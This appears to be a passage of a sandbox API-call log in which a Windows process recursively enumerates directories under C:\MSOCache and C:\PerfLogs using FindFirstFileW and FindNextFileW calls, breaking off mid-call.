FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa28ec8 [0133.703] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0133.703] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0133.703] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0133.703] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0133.703] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0133.703] FindClose (in: hFindFile=0xa28ec8 | out: hFindFile=0xa28ec8) returned 1 [0133.703] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0133.703] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.704] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa28ec8 [0133.704] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0133.704] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0133.704] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0133.704] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0133.704] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0133.704] FindClose (in: hFindFile=0xa28ec8 | out: hFindFile=0xa28ec8) returned 1 [0133.704] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0133.704] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.704] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa28ec8 [0133.704] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0133.705] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0133.705] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0133.705] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0133.705] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0133.705] FindClose (in: hFindFile=0xa28ec8 | out: hFindFile=0xa28ec8) returned 1 [0133.705] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0133.705] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.705] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.705] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.705] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0133.705] FindClose (in: hFindFile=0xa2e408 | out: hFindFile=0xa2e408) returned 1 [0133.705] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0133.706] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0133.706] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa2ea58 [0134.386] FindNextFileW (in: hFindFile=0xa2ea58, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0134.386] FindNextFileW (in: hFindFile=0xa2ea58, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0134.387] FindNextFileW (in: hFindFile=0xa2ea58, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0134.387] FindNextFileW (in: hFindFile=0xa2ea58, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0134.387] FindNextFileW (in: hFindFile=0xa2ea58, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0134.387] FindNextFileW (in: hFindFile=0xa2ea58, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0134.387] FindClose (in: hFindFile=0xa2ea58 | out: hFindFile=0xa2ea58) returned 1 [0134.387] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0134.387] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0134.387] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa28ec8 [0134.603] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0134.604] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0134.604] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0134.604] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0134.604] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0134.604] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0134.604] FindClose (in: hFindFile=0xa28ec8 | out: hFindFile=0xa28ec8) returned 1 [0134.605] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0134.605] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0134.605] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa2e408 [0137.247] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.247] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.247] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.247] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.247] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.247] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0137.247] FindClose (in: hFindFile=0xa2e408 | out: hFindFile=0xa2e408) returned 1 [0137.247] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0137.247] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0137.248] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa2e408 [0137.367] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.367] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.367] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.368] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.368] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.368] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0137.368] FindClose (in: hFindFile=0xa2e408 | out: hFindFile=0xa2e408) returned 1 [0137.368] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0137.368] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0137.369] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa2e408 [0137.369] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.369] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.369] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.369] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.369] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.369] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0137.370] FindClose (in: hFindFile=0xa2e408 | out: hFindFile=0xa2e408) returned 1 [0137.370] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0137.370] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0137.370] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa28ec8 [0137.723] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.723] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.723] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.723] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.723] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0137.723] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0137.723] FindClose (in: hFindFile=0xa28ec8 | out: hFindFile=0xa28ec8) returned 1 [0137.723] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0137.723] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0137.724] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa2e408 [0139.055] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.055] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.055] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa28ec8 [0139.055] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.056] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.056] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0139.056] FindClose (in: hFindFile=0xa28ec8 | out: hFindFile=0xa28ec8) returned 1 [0139.056] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.056] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.060] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.060] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.060] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.060] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.060] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.061] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.061] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.061] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.061] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.061] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.061] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.061] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.061] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.061] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.061] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.061] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0139.061] FindClose (in: hFindFile=0xa2e408 | out: hFindFile=0xa2e408) returned 1 [0139.062] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.062] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa2e408 [0139.203] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.203] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32828 [0139.325] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.325] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.325] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.326] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.326] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.326] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0139.326] FindClose (in: hFindFile=0xa32828 | out: hFindFile=0xa32828) returned 1 [0139.327] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.327] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.327] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.327] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.327] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0139.327] FindClose (in: hFindFile=0xa2e408 | out: hFindFile=0xa2e408) returned 1 [0139.327] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.328] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.329] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32828 [0139.374] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.374] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.375] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.375] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.375] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.375] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.375] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.375] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.376] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.376] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.376] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.376] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.376] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.376] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.376] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0139.376] FindClose (in: hFindFile=0xa32828 | out: hFindFile=0xa32828) returned 1 [0139.377] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.377] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.377] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32828 [0139.652] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.652] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.653] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.653] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.653] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.653] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.653] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.653] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.653] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.653] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.653] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.653] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.653] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.653] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0139.653] FindClose (in: hFindFile=0xa32828 | out: hFindFile=0xa32828) returned 1 [0139.654] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.655] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.655] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32828 [0139.706] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.706] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.706] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.706] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.706] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.706] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.706] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.707] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.707] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.707] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.707] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.707] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.707] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.707] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0139.707] FindClose (in: hFindFile=0xa32828 | out: hFindFile=0xa32828) returned 1 [0139.707] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.707] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0139.707] FindClose (in: hFindFile=0xa28e88 | out: hFindFile=0xa28e88) returned 1 [0139.707] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0139.707] FindNextFileW (in: hFindFile=0xa28e48, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0 [0139.707] FindClose (in: hFindFile=0xa28e48 | out: hFindFile=0xa28e48) returned 1 [0139.707] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2287a78 | out: hHeap=0x20f0000) returned 1 [0139.708] FindNextFileW (in: hFindFile=0xa28478, lpFindFileData=0x2b4f8f8 | out: lpFindFileData=0x2b4f8f8) returned 1 [0139.708] FindNextFileW (in: hFindFile=0xa28478, lpFindFileData=0x2b4f8f8 | out: lpFindFileData=0x2b4f8f8) returned 1 [0139.708] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0xa32828 [0139.709] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0139.709] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0139.709] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa32868 [0139.709] FindNextFileW (in: hFindFile=0xa32868, 